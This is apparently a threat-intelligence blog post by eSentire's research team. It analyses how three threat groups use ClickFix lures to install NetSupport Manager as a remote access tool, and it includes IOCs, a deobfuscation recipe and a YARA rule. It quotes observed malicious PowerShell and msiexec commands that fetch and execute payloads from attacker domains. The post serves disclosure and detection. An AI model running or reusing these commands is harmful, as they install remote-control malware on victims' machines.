Combine AI-driven security operations, multi-signal attack surface coverage and 24/7 Elite Threat Hunters to help you take your security program to the next level.
Get unlimited Incident Response with threat suppression guarantee - anytime, anywhere.
CTEM and advisory programs that identify security gaps and build proactive strategies to address them.
Multi-agent Generative AI system embedded across eSentire’s Security Operations platform to scale human expertise.
Extended Detection andOpen XDR with Agentic AI & machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Customer PortalSee what our SOC sees, review investigations, and see how we are protecting your business.
Platform IntegrationsSeamless integrations and threat investigation across your existing tech stack.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Threat Response Unit (TRU)Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Cyber Resilience TeamExtend your team capabilities and prevent business disruption with expertise from eSentire.
Response and RemediationWe balance automated blocks with rapid human-led investigations to manage threats.
Flexible MDR pricing and packages that fit your unique security requirements.
Entry level foundational MDR coverage
Comprehensive Next Level eSentire MDR
Next Level eSentire MDR with Cyber Risk Advisors to continuously advance your security program
Stop ransomware before it spreads.
Identity ResponseStop identity-based cyberattacks.
Zero Day AttacksDetect and respond to zero-day exploits.
Cybersecurity ComplianceMeet regulatory compliance mandates.
Third-Party RiskDefend third-party and supply chain risk.
Cloud MisconfigurationEnd misconfigurations and policy violations.
Cyber RiskAdopt a risk-based security approach.
Mid-Market SecurityMid-market security essentials to prioritize.
Sensitive Data SecurityProtect your most sensitive data.
Cyber InsuranceMeet insurability requirements with MDR.
Cyber Threat IntelligenceOperationalize cyber threat intelligence.
Security LeadershipBuild a proven security program.
THE THREAT On October 15th, 2025, F5 disclosed that the organization was impacted by a breach involving an unspecified state-sponsored threat actor. The threat actors were…
THE THREATOn October 4th, 2025 Oracle released a security advisory addressing a critical, zero-day vulnerability impacted its E-Business Suite (EBS), identified during their investigation…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
About Us Leadership CareersWe provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Search our site
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
We offer three flexible MDR pricing packages that can be customized to your unique needs.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
During 2025, eSentire's Threat Response Unit (TRU) has observed numerous NetSupport Manager-related incidents attributed to three distinct threat groups. Consistent with broader cybercriminal trends, these groups have shifted their primary delivery strategy from Fake Updates to ClickFix between 2024 and 2025.
This ongoing practice of leveraging legitimate remote administration tools for malicious purposes continues patterns documented in previous security advisories.
TRU’s analysis shows a recurring attack methodology across most incidents: attackers initially compromise victims through social engineering via the ClickFix initial access vector, compelling them to execute malicious commands in the Windows Run Prompt.
This action triggers the extraction and execution of NetSupport on the target system.

The first code snippet shown below provides two examples of commands observed in incidents where threat actors use a specific PowerShell-based loader to drop and execute NetSupport. The first example shown executes SHA256: a823031ba57d0e5f7ef15d63fe93a05ed00eadfd19afc7d2fed60f20e651a8bb.
TRU observed the usage of this loader in a vast majority of NetSupport Manager related incidents.
"PowerShell.exe" -w h -nop -ep Bypass -c "$S='hxxps://riverlino[.]com/U.GRE';$j=$env:TEMP+'\1.ps1';(New-Object Net.WebClient).DownloadFile($S,$j);powershell -f $j"
"PowerShell.exe" -w h -nop -c "&('iex') (New-Object IO.StreamReader([Net.WebRequest]::Create('https://xunira[.]cloud/C[.]GRE').GetResponse().GetResponseStream())).ReadToEnd()" The contents and behavior of the PowerShell-based loader have remained consistent throughout 2025 and can be seen annotated in the figure below, which performs the following actions:

Illustrated below is a sample of the JSON configuration utilized by the PowerShell loader. The configuration consists of a structured list where each entry contains two key elements: a designated filename (such as the NetSupport client binary "client32.exe") paired with its corresponding payload content encoded in base64 format.

A similar yet different loader has been observed in more recent incidents that employs a technique to hide evidence of Run Prompt execution by deleting registry values in the RunMRU registry key. The licensee is KAKAN, however it shares attributes and TTPs with EVALUSION campaigns described later in this blog. The file analyzed in this case has SHA256: 37d1d033e19cf9dc7313846d9d4026b03d2f822efccd963e5697e9633a4df0d0.

Though less common, the code snippet below shows commands from incidents where threat actors leveraged the msiexec LOLBin to remotely retrieve and run MSI installer packages for deploying NetSupport. The file analyzed in this case has SHA256: d5b13eb9e8afb79b4d7830caf3ac746637e5bda1752962e5bd0aed3352cc4a42.
msiexec.exe /i hxxps://global-weekends[.]net/res/helprecord /qn ba5ceb26=2bbb8402(f346c24d*e4bc04ef(8623a414_fad334a0
msiexec.exe /i hxxps://stradomi[.]com/res/presentjudge /qn 84e58207=a84823e3_c3ef427e(29bf9dc6%d30821f6*65bca359)9136c3b0*d438d401%fc61d016The MSI installer executes a base64 encoded PowerShell command (seen truncated in the code snippet below).
powershell.exe -enc JABsAGwAPQBAACgAMgAyADMALAAyACwAMgAyADYALAAyADAfter decoding the base64 encoded command, we can see the next stage deobfuscates an array of bytes, converts them to a character array, joins the array as a string, and invokes the string as PowerShell via Invoke-Expression (IEx). Each original byte is stored in decimal + 97, so this stage performs the inverse by subtracting each character point by 97.

The following CyberChef recipe can be used to deobfuscate the MSI installer loader PowerShell described.
From_Base64('A-Za-z0-9+/=',true,false)
Remove_null_bytes()
Register('@\\(([\\d,]*)\\)',true,false,true)
Find_/_Replace({'option':'Regex','string':'.*'},'$R0',true,false,true,false)
Find_/_Replace({'option':'Regex','string':'(\\d+),?'},'$1 97\\n',true,false,true,false)
Fork('\\n','\\n',false)
Subtract('Space')
From_Charcode('Line feed',10)
Merge(true)
Find_/_Replace({'option':'Regex','string':'\\n'},'',true,false,true,false)The figure below displays the beginning of the recipe, which functions first by converting the encoded command from base64, removing null bytes (as PowerShell base64 commands are UTF-16LE encoded), using the Register operation to extract the obfuscated byte array, replacing the input with the obfuscated byte array, and finally replacing each obfuscated character point with 97 and a new line.

By using the Fork operation, CyberChef processes each line separately via subsequent operations. The recipe then uses the Subtract operation on each line, revealing the original decimal points for each deobfuscated character.

To make the output human-readable, the recipe then uses the From Charcode operation (Base 10) and merges new lines.

The resulting output reveals yet another stage that sends an HTTP request with a GoLang-based user agent “Go-http-client/1.2” and invokes the response via Invoke-Expression.

Traffic identified through analysis of samples involves C2 activity with NetSupport Connectivity Servers (Gateways) using version 1.92. This can be seen in the following figure, where the client first sends the POLL command.

Through analysis and correlation of common attributes, infrastructure, and TTPs, TRU has found a potential of three distinct threat groups using NetSupport Manager for malicious purposes. Each group is designated by its licensee name (extracted from each campaign’s “NSM.LIC” file).
SHA256: f81220b94384e98203d230fe6a386b6047157474d16f7e75e0f4ffb6d8bdcde3
Technical Clustering Evidence:
Infrastructure Spread:
Assessment: Deliberately spreads infrastructure across multiple countries, uses similar hosting/loaders to “FSHGDREE32/SGI” campaigns, however this group appears more active and uses many variations of loaders.
SHA256: 94c2f209e5710fe5b2d2c6ac8ab6060db67627331ca11c1394fbded2875d039f
Technical Clustering Evidence:
Infrastructure Spread:
Shared Bulletproof Hosting:
Assessment: Deliberately spreads infrastructure primarily across multiple Eastern European countries, uses similar hosting/loaders to “EVALUSION” campaigns.
According to ProofPoint’s blog Remote Monitoring and Management (RMM) Tooling Increasingly an Attacker’s First Choice, this group is known as, “UAC-0050”, which has targeted Ukrainians with NetSupport in the past.
SHA256: f3f44fd37502cd4b16bca3c3fb1e88a687bd2980926017b0ff1752dc601d4c1e
Technical Clustering Evidence:
Infrastructure Attribution:
Assessment: Completely separate threat actor with fundamentally different operational patterns from other clusters. Uses commercial infrastructure rather than bulletproof hosting.
To aid security researchers, eSentire has developed an automated unpacking utility available here, which processes many different variants of second-stage PowerShell payloads and extracts embedded NetSupport configuration files and payloads. This utility covers the variants mentioned in this blog, as well as others identified through threat hunting variants in VirusTotal.

The following Yara rule detects NetSupport on-disk/in-memory.
import "pe"
rule NetSupport
{
meta:
author = "YungBinary"
description = "Detects NetSupport Manager RAT on disk or in memory"
strings:
$a1 = "NetSupport Manager" wide
$b1 = "NetSupport Remote Control" wide
$s1 = "Client Application" wide
$s2 = "NetSupport Ltd" wide
condition:
uint16(0) == 0x5a4d and ((pe.imports("PCICL32.dll", "_NSMClient32@8")) or (($a1 and $b1) or ($s1 and $s2)))
} To learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next Level MDR, connect with an eSentire Security Specialist now.
GET STARTEDThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.